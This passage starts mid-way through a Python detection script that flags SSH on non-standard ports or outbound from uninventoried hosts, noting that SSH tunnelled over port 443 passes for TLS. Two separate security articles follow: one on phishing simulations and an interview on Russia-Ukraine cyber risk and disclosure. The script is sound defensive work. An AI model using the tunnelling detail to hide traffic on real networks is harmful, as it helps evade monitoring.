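    return ts, src, dst, int(dport), service


def find_suspicious_ssh(lines: Iterable[str], inventory=ASSET_INVENTORY) -> List[Finding]:
    """Return a Finding for every SSH record that is on a non-standard port,
    or is outbound from an internal address that the inventory does not know."""
    findings: List[Finding] = []
    for line in lines:
        ts, src, dst, dport, service = parse_conn_line(line)
        if service != "ssh":
            continue
        reasons = []
        if dport != 22:
            reasons.append("nonstandard_port")
        if is_internal(src) and not is_internal(dst) and src not in inventory:
            reasons.append("outbound_unknown_asset")
        if reasons:
            findings.append(Finding(ts, src, dst, dport, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_ssh(SAMPLE_CONN_LOG):
        print(f"{f.ts} {f.src} -> {f.dst}:{f.dport}  {', '.join(f.reasons)}")
```

Keying the first check on the sensor's service identification rather than on the destination port is what catches the tunnelled case: SSH carried over port 443 looks like TLS to a port-based rule. The second check deliberately does not flag outbound SSH from inventoried hosts, matching the narrower recommendation in the quote; widening it to all outbound SSH is a local tuning decision.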


Do phishing simulations work? Sometimes

May 2, 2022

Phishing simulations are becoming increasingly popular to pinpoint which employees fall victim to scams, but their effectiveness and morality have been called into question.

Eighty-three percent of organizations reported experiencing a successful email-based phishing attack in 2021, with 54% responding they dealt with more than three successful attacks in the same year, according to a Proofpoint survey.

Phishing attacks, which were up 26% in 2021 over 2020, are one of the leading causes of data breaches. Preventing employees, partners and contractors from falling victim to these scams is paramount.

Social engineering penetration testing, which often includes sending mock phishing emails to employees to gauge their security awareness, has become a common practice to combat the threat. But these tests are under hot debate, with many questioning their efficacy, as well as whether the negatives — such as creating distrust and damaging company morale — outweigh the benefits.

Do phishing simulations work?

Cybersecurity awareness trainings have remained relatively stagnant over the past decade, according to Jinan Budge, analyst at Forrester Research. The widespread adoption of phishing simulations has been the only major development in recent years, she added.

Phishing tests are used to collect data on employees’ click and response rates to malicious emails, links and attachments. The simulations are meant to help employees recognize malicious emails.

But do they have any lasting effect?

A 2021 study from ETH Zurich, a public research university in Switzerland, concluded phishing simulations — at least embedded phishing tests, which tell employees when they clicked a phishing link or send an employee who clicked a malicious email to voluntary training — don’t necessarily help reduce click and dangerous action rates among employees.

ETH Zurich researchers concluded that “embedded phishing training is … not effective and can in fact have negative side effects,” suggesting tests make users more susceptible to attacks because employees either gain false confidence from the trainings or start to feel less responsible for stopping such attacks.

The researchers did find crowdsourced phishing simulations, on the other hand, to be effective. Participants in the experiment were given a button to alert the security team of a suspicious email. They correctly reported 68% of phishing emails, aiding the security team in phishing prevention.

The study did say, however, that even crowdsourced phishing simulations should complement other security awareness measures.

Gartner analyst William Candrick agreed. Phishing simulations alone aren’t effective, he said, unless an organization has a program to engage repeat offenders.

Enterprises should use data from phishing tests to identify high-risk employees and then enforce mandatory and interactive cybersecurity awareness trainings.

Are phishing simulations ethical?

Despite their ability to identify risky employees, phishing simulations remain controversial, even among security professionals.

In September 2020, Tribune Publishing Company sent employees an email offering bonuses of up to $10,000. After clicking the link to see how much their bonus would be, however, employees learned they failed a phishing test — and would receive no bonus. Employee backlash, viral social media posts and bad publicity ensued, especially as the email was sent out after several recent years of layoffs and furloughs — not to mention amid a global pandemic.

But that doesn’t mean the tests are wrong, per se.

“Everyone gets mad [about phishing simulations] … but the IT department is perfectly in the right, and the cybersecurity team is doing exactly what it should be doing,” said Johna Till Johnson, CEO of Nemertes Research. “Hackers are not sensitive to the feelings of employees.”

While it may be legal, it isn’t always moral. “You have to consider many factors when conducting a simulation,” Budge said. She suggested asking the following phishing simulation questions before deploying a test:

How will it impact employees’ mental health?
Is the simulation necessary?
How will the message be perceived?
Does this benefit employees?
Are we being smug, or do we genuinely want to change behaviors?
Is there a better way to communicate this message?

Asking these questions also helps prevent security teams from ostracizing themselves from the rest of the organization, she added.

It’s also important for security teams to teach and regularly reiterate that cybersecurity is a team sport. Security is often viewed as IT’s problem; 70% of employees believe it is IT’s responsibility to ensure company accounts are not breached or hacked. Without the proper messaging, phishing simulations only reinforce this mindset.

If a company does use phishing simulations, Candrick suggested security teams conduct extended phishing campaigns with increased difficulty over time. This helps employees who are doing well continue to improve and feel rewarded for their efforts.

Phishing is here to stay — and so are phishing simulations, at least for the time being. While evidence shows phishing simulations alone are ineffective, they can be useful in conjunction with risk management practices and a security awareness program that uses the data collected from these tests to identify and train high-risk employees.

“Phishing simulations are a necessary evil at the moment,” Budge said.


Russia-Ukraine war prompts security best practices refresher

By Dave Sobel, Guest Contributor

Published: 02 May 2022

Dave Sobel is host of the podcast The Business of Tech and co-host of the podcast Killing IT. In addition, he wrote Virtualization: Defined. Sobel is regarded as a leading expert in the delivery of technology services, with broad experience in both technology and business.

In this video, Sobel looks at what the Russia-Ukraine war means for cybersecurity in the IT services space with Blackpoint Cyber CEO Jon Murchison. Murchison discusses a worst-case scenario and what best practices IT services providers should have in place to protect their business and customers.

Transcript follows below. Minor edits have been made for brevity and clarity.

Dave Sobel: I wanted to bring somebody in from the security space to talk to me a little bit about the current situation related to Ukraine and Russia. It’s on all of our minds. And, from a cyber perspective, I think most of us in IT services are looking, going like, ‘Well, it feels like attacks are going a little lower because they’re focused on one another.’ What are the experts seeing? What are you seeing?

Jon Murchison: This is a really big topic. As soon as this popped off, it was like instant security theater from every marketing department, like ‘The world’s going to come down.’ We internally recorded a private video, not for public consumption, of our thoughts to our customer base. And here’s the uncut, just pragmatic take. We have seen zero increase in volume or sophistication of attacks, either from nation-states or ransomware groups. Now, when we talk to the MSP space, I would say ransomware is 95% of what we’re stopping on pretty much a daily basis. Nation-states are more like 2%, just because [for] the typical customer an MSP serves — unless it’s like a regional utility or some small boutique manufacturer in a critical supply chain for a defense or aircraft or whatever — you just don’t see [nation-states attack] a lot.

With that being said, it is plausible to think that maybe the Russian-based ransomware groups could feel more empowered to increase their operations. At the same time, Conti had some issues. Conti is obviously one of the biggest Russian-based ransomware syndicates. And, like all these syndicates, they’re folks from all different countries. I don’t know if they had Ukrainian guys in the game or not, but they probably had some pretty massive leaks that have caused us to see different tradecraft.

Big picture, it’s a good reminder to button up on the fundamentals. When nation-states go to war, you must assume the nation-state assets coalesce to focus on that topic. And they can’t take on everyone at once. They have a lot of things going on. They’re getting bogged down, obviously, in the conventional military side. They have vigilante cyber groups going after them. That has to eat up some of their defensive capabilities. And I would think their offensive guys are still primarily focused on Ukraine. That’s not to say there isn’t a threat here in the United States, that we shouldn’t be prepared. We should. But I think you’re really looking more at banking, big manufacturers, logistics. Then, critical infrastructure — I don’t know where that magic red line is because this has never really happened, like full-scale nation-state-on-nation-state warfare. I have to think there’s a red line, but I have to think the bar would be a little bit lower for regional municipalities. We see a lot of combined networks. Big picture, we haven’t seen anything yet, but we’re prepared if we do.

Sobel: Is that the extent of the collateral damage? Do you think there’s collateral damage we need to be thinking about in this conflict?

Murchison: I think the collateral damage will happen if offensive actions are taken against Western countries, where it’s like, ‘This is clearly a nation-state, not just like a criminal syndicate or something like that.’ I haven’t seen it happen, or I don’t know enough deep-in-the-weeds technical details, [but] I have read that there have been — and I have no inside info — that there have been some attacks on Ukrainian ISP internet infrastructure. That has always been my greatest concern. Utilities and SCADA [supervisory control and data acquisition] attacks and all this stuff, and banks get all the press. But the reality is SCADA attacks are still pretty hard to pull off. And, when you look at the one the Russians did against the Ukrainians a bunch of years ago, did it shock everyone? Yes. It took the power out for about 230,000 people, for like [one to six hours], but there’s actually no SCADA protocol or [programmable logic controller] attack in that. It was actually more ‘live off the land, literally open the breaker’ type attack and destroy everything on the way out. And, frankly, we have thunderstorms in the spring and summer that do way worse here all the time. Those are really hard. I worry much more about routing and switching infrastructure at the core. That is the glue that everyone sleeps on that is, by far, in my opinion, the most critical infrastructure when it comes to internet [communications] because it just has cascading effects everywhere.

Sobel: I’m going to ask you, then, to take out your crystal ball, and the typical caveats on this, it’s a crystal ball. It’s cracked, and it’s foggy.

Murchison: So, I’m just going to make it up.

Sobel: Right. So, we know it’s not great. Talk to me about how you think this might play out, and maybe we’ll do sort of two scenarios to give you a little sense. What’s the worst way this might play out, cyber-wise, and what we’d be hoping for on the good end of the spectrum?

Murchison: I think the worst way this plays out on the cyber side is there’s large-scale attacks against internet communications, infrastructure, media infrastructure, banking, manufacturing and logistics. That being said … I mean, I come from the intelligence community world. I also think that’s really hard to pull off and time it right. These things just don’t work. There’s not physics involved quite the same as launching a missile and it hits the target. You fail way more than you ever win. Achieving effect with timing, achieving the ultimate mission goal, it’s quite difficult, and it requires a lot of things to go your way. And I also can’t imagine doing it while being attacked at the same time. It would actually be quite difficult. I think, on the worst-case scenario, they just decide to go all in on cyber warfare. I got to be honest, I think, if that happens, this is escalating to a whole other ballgame. We need to be candid, cyber is like the least of our worries. I worry much, much more [about other types of attacks], to be candid, and way less about the cyber side. I worry way more on this going something past conventional or something where our satellite infrastructure is.

Sobel: I want to do a double-check. I think the answer is the standard best practices, but I want to double-check it. From a typical IT services company, serving a collection of customers, are the recommendations essentially just continue good best practices, or is there something unique to this situation?

Murchison: No, I think there’s more, but I don’t think it’s unique to Russia-Ukraine. I think it’s unique to the threat of an attack on your continuity of operations, whether it’s ransomware, or data theft, or holding you hostage, or a destructive attack, like the wiper stuff we see. Industry best practices mostly, to me, focus on reducing your attack surface. The way we like to look at it — and it’s kind of a riff of a [NIST] model, called the Cyber Defense Matrix that Sounil Yu made — but we take a step back, and you look at any infrastructure, and this is taking compliance out of it because I consider that mostly checkbox security. In bucket one, you need to have some capability to identify your assets’ patch level, what you have. And that’s actually something we see people whiff on all the time. You have to know what you need to protect and have some live visibility into it. That’s step one.

Step two, which is where I see a lot of the best practices come in, is hardening. This is IT hygiene. This is everything from locking down your remote monitoring and management, multifactor authentication, regular patching, continuous external vulnerability scanning specifically that reduces your susceptibility to remote code execution. That’s a key area.

And then, the next two areas [are] where I diverge with industry best practices, kind of in air quotes, because, when you look at detection, most cyber malicious activity breach detection is so myopically focused on the malicious tool set. And the dirty secret, if you’ve ever done this game before, is your malicious tool sets are part of the game, but so much of what you do on the keys looks like clever system administration. You’re trying to figure out where you are, you’re testing creds, you’re port scanning, and that’s what we call ‘tradecrafter behavior.’ And that’s where these two worlds need to be merged together. And, frankly, there just aren’t a lot of people that are good at it out there still — because so much of the dev effort goes towards catching the malicious software. I always say, if you ask a software engineer — which I consider the biggest brain guys — to catch a hacker, they’re going to try and catch what they would make if they were on the offensive side, which is persistence techniques, exploit techniques and then just malware in general. If you ask the guy in the keys, many times, he’s going to be looking for some amount of dollar sign chair, all that live off the land, privileged creds, lateral spread. I think it’s really important in the tech, you merge those two areas.

And then the third part is response. This is where our industry has kind of bastardized the term a lot. But what it really should mean is real-time response. If you don’t have a capability at two in the morning to operate within, assume your breach and assume your automated security tools don’t succeed, how are you going to take action? And I think that’s where the industry’s changing. The typical model was, I get a SIEM [security information and event management], I gobble up terabytes of logs, I make dashboards and I have threat hunting. Well, that does not work at line rate, period. It just does not work fast enough, but it’s great for compliance. It’s great for checking the boxes. It’s great for forensics post-breach.

And then the last bit would be really the right of boom, assuming all went wrong, and that’s best practices, cloud backups, having a disaster recovery plan, just making sure you have your insurance and [incident response] folks, that you actually know who to call. I think part of it is what capabilities you have in place, combined with best practices on hardening.

Sobel: I’m going to ask you a really targeted one around best practices because it’s one that I feel gets an interesting debate. The head of the U.K. cyber center actually came out recently and sort of commented, ‘I think most businesses should go to [automated] patching because patching is a pretty standardized thing these days. It’s pretty well maintained. These big companies generally know what they’re doing. And, by the way, because of the problem, like just turn [automated] patching on.’ Most IT providers come from a legacy of thinking everything has to be tested, constantly checked. Where do you fall in this idea of — particularly for smaller companies like the typical SMB — shouldn’t they just turn autopatching on? Isn’t that better?

Murchison: I’m going to have a weird answer. I was a network engineer before I got into hacking. I have a natural reaction that the IT guys have, which is, ‘until my Windows 11 computer can update and not break shit.’ … Think of manufacturers. There are so many industries where a patch takes them down. It can do as much harm as good. I’m a firm believer in continuous vulnerability scanning in a regular patching platform. If I saw a better track record of autopatching not breaking stuff, then maybe I’d support it. But I can tell you, we have issues once in a while in our cloud where we run a really modern stack, and Amazon might auto patch something for us that causes us problems.

I think there’s just too many moving parts to send it. Now, if you’re just talking about like auto Windows update on like an attorney’s office that doesn’t have manufacturing or any sort of weird technologies, yeah, I think it’d be fine. And I actually think Microsoft is working on some really cool new patching capabilities via their Graph API, if I’ve heard it right, that are outside of the Windows update. And I think that might open the door for a little more flexibility.

Sobel: I’ll let you split the difference on that because, in fact, when I think of that, I do actually think of that typical small little lawyer. And I just sort of say, ‘I think that I’ll just turn the thing on automatically.’

Murchison: That one’s probably good. When I look at our customer base, we do large enterprise, too, but it is like everything from a tiny five-person property management shop to a lot of manufacturers, logistics and people that really will go down hard if the patch messes up.

Sobel: And I think, by the way, this is where the expertise comes in. But it isn’t a one size fits all. And I am advocating, at least, for many network engineers to go, ‘Look, in some of these cases, autopatching is better.’ There are use cases at the low end where just make that automatic and don’t think about it because that’s the bigger risk for them.

Murchison: I think so. But, you know, also when I look at what burns most companies. … It’s funny, if you read the Verizon breach report, it’s phishing, phishing, phishing, phishing. We do not see phishing as the number one way you get ransomware. It’s the number one way you’re going to detect malware because it’s coming in through there all the time. And I think that skews the results. What we still see nonstop, [Remote Desktop Protocol] opening internet, a lack of patching on your network and security appliances. That’s a huge area. Running a [demilitarized zone], they should be dead. Everyone screws them up. They screw up the rules. It’s hard to write the firewall rules right. Maybe autopatching is best on anything sitting live on the boundary internet-facing.

When it comes to the inside, the reality is it’s rare that we see exploits thrown inside the network. Usually, it’s a way to get in. I’ll tell you the area I totally believe in autopatching is in the browser. I’m sure hackers would disagree, but my opinion is the holy grail exploit, the one if you could pick any exploit you want — it’s not a firewall exploit because everyone runs a different firewall — it’d be like an Edge, Chrome or Firefox remote code execution technique. If I can give them an ad or something or whatever exploit and get access to their system, that is the area. That should be, as soon as a new update comes out, roll it because that has less effects than a system patch — because system patches just aren’t exploited that much inside the network. I would focus on boundary.

Sobel: That’s some great advice. I’m going to give one more targeted technical and then move this back into regulation. What about the idea of just blocking countries? The vast majority of small businesses, which are most businesses out there, they’re not doing business with a long list of countries that just shouldn’t even have access. Why aren’t the default rules set to just block a whole bunch of countries from even coming in? Would that make more sense?

Murchison: Yes. Beats the hell out of me why it’s not. It should be just by default, period. Now, if someone really wants, it knocks out a certain amount of low-hanging fruit. There’s no cost to doing it, and there’s really no drawback for not doing it. I 100% agree with you, Dave. There’s no question, those should be blocked default. I will caveat that with, we stopped the nation-state attack on one of our non-MSP customers the week of Thanksgiving. This was definitely in relation to a political move we made as a country. That night, we had guys come in. This entity was running two next-gen [antivirus endpoint detection and response] in addition to us, and the bad guys evaded both of those, no problem. Not a single alert, but they used residential proxy infrastructure in the U.S. to come through the United States to hide their tracks. SolarWinds stuff did that, too. And any legit operator will do that. It’s not a cure-all, but it’s a definite, do it.

Sobel: And that’s what I’m getting at, is just like, ‘Hey, if we can reduce our attack surfaces, let’s do the simple things,’ knowing, again, for the typical small, midsize company, they’re not going to win against a nation-state. Let’s just do that. Let me pivot then a little bit to regulation and the landscape. What’s your take on the need for more formal rules of engagement around cyber, like similar to the Geneva Convention or international laws on physical warfare? Because it feels like we don’t have even law enforcement or diplomatic rules to latch onto here. What’s your take on the need for these formal rules?

Murchison: That is a loaded question. First off, I don’t believe any international norms, diplomatic engagement, when a country or nation-state is desperate enough, they don’t care. I think we’re seeing that in Ukraine right this second. Cluster munitions — using them like crazy. White phosphorus — using them. I don’t think that actually really moves the needle, I think that feels good. I’ll tell you the area where we need a lot more focus is. … Step one, everyone creates a compliance framework. And, when I read these, half the compliance frameworks out there, they’re written clearly from someone that was never an offensive practitioner or even a hardcore defensive. And they’ve written all post-breach lessons learned. Like you must have these logs so we can figure out what data was stolen. But, at the end of the day, these things should be increasing your capacity to not get breached in the first place or, if you do, nullify it before the adversary completes their objectives.

This is why I’m a huge fan of the [Center for Internet Security’s] benchmarks and controls because they’re actually prescriptive. They tell you to configure the following settings to reduce your attack surface. Whether it’s by regulation or the market drives it, I think this is something where MSPs should really be looking to adopt it because, honestly, it’s just smart business. Anything you can do to reduce your chances as an MSP owner from your customer getting smashed and then blaming you, which hurts your insurance and your whole business model, I would do it.

I’ll tell you the other area — and others might not agree with me — that I think needs some tightening up. We have an insurance agency, right? We had to get licensed and fingerprinted in all 50 states to resell someone else’s insurance policy. Yet, I can go write an exploit proof-of-concept code, throw it up on GitHub and get all the congratulations from the security community, no license, no regulation. People will do bug bounties. One of the scariest things — and I agree, we need bug bounty stuff — but one of the things that always makes me nervous is when you have vigilante entities out there that are doing pen testing without your request, which we all know it’s kind of like, ‘Do it well.’ You have to cross that line sometimes and actually execute code. When they do that and they’re like, ‘Oh my gosh. We have something bad,’ they call the company. Then, they make scanners that try to find other vulnerable victims. Well, to think that nation-states are not looking and have honeypots out there looking for these people with new exploit techniques, you’re crazy. They are. And that’s a great way, in the interest of security, to actually let the cat out of the bag. And then, it takes it a step further. Now, you’re arming maybe more competent and capable adversaries with your great new research findings. And then, you call the company, and then you [Common Vulnerabilities and Exposures] them when maybe there is no user involvement required. I think it’s ethically corrupt, and I think it’s not good for security because, if you can close a problem, there’s no impact, no harm. It hasn’t been taken advantage of. You’re still operating as a defender with a bit of an information asymmetry advantage or that vendor. When you make it public, how many variant follow-on [attacks]? Also, like the Exchange thing had multiple. … Once the community found out about it, you start seeing follow-on exploits. And so, that’s why I think nuance matters, details matter. 

And we have to balance transparency with actually doing what’s right for the end customer and vendor to keep the infrastructure secure so that it isn’t all about just getting resume builders for the security research community. Because I think they play an incredibly legit role, but there’s no security industry I’ve ever seen in the world with utter, complete 100% transparency.

Sobel: You’ve opened the door. My follow-on question is obvious. What’s your take on what a vulnerability disclosure program should be like? What’s the way that it should work for software vendors?

Murchison: In my opinion, if there is a vulnerability that requires end-user involvement, like the IT guy, the end customer, to apply a patch because it cannot be pushed out, you have to shout that from the rooftops. That has to be public, and it has to be everywhere. If you have a capability that was brought to you, there was no evidence that it was ever exploited, it was never known about a criminal group, I personally think the act of writing about that is doing nothing but educating your adversaries on a potential weakness. And, if it was covered up, I think everyone should keep their mouth shut. I also think a formal bug bounty program, where you can work with the researchers, is really good.

Sobel: That’s why I asked the question. If vulnerability disclosure is the front end, let me ask then what’s your take on breach disclosure, which is essentially the back end of that. What’s your take on breach disclosure notifications?

Murchison: Oh, I think that’s a legal issue. And I think you absolutely have to do it, and each state has different rules on it. First off, that is something like you. … Listen. You kind of judge people on what they do when no one’s looking, right? And I think this is a perfect case, if you sweep it under the rug, that’s an unethical move. You need to inform your customers. I would say the definition of breach is also, maybe there’s a legal definition for it, but you know. … We stop stuff every day. Bad guys in network, he’s going nowhere, he’s snuffed out, done. Should a vendor disclose that to the world? I don’t know. I don’t think that does anything for anyone but create concern or panic. If part of their code base was stolen, if their customer data was stolen, unequivocally, you have to.

Sobel: OK. I’m going to ask it a different way then. If I gave you the magic wand and you could cast a federal piece of regulation around breach disclosure, what would your version look like?

Murchison: I think my version would start with a definition of what we considered a breach. So, kind of along the lines of what I was just saying: loss of customer data, loss of [personally identifiable information], loss of source code or something that could enable follow-on attacks or something that actually disrupted operations. There was a malicious thing that disrupted operations and maybe left you not serviced at that point in time. That’s something where there should be a requirement to disclose to your customer base and a requirement to disclose to the appropriate government agency.

About the author
Dave Sobel is host of the podcast The Business of Tech, co-host of the podcast Killing IT and authored the book Virtualization: Defined. Sobel is regarded as a leading expert in the delivery of technology services, with broad experience in both technology and business. He owned and operated an IT solution provider and MSP for more than a decade and has worked for vendors such as Level Platforms, GFI, LOGICnow and SolarWinds, leading community, event, marketing and product strategies, as well as M&A activities. Sobel has received multiple industry recognitions, including CRN Channel Chief, CRN UK A-List, Channel Futures Circle of Excellence winner, Channel Pro’s 20/20 Visionaries and MSPmentor 250.
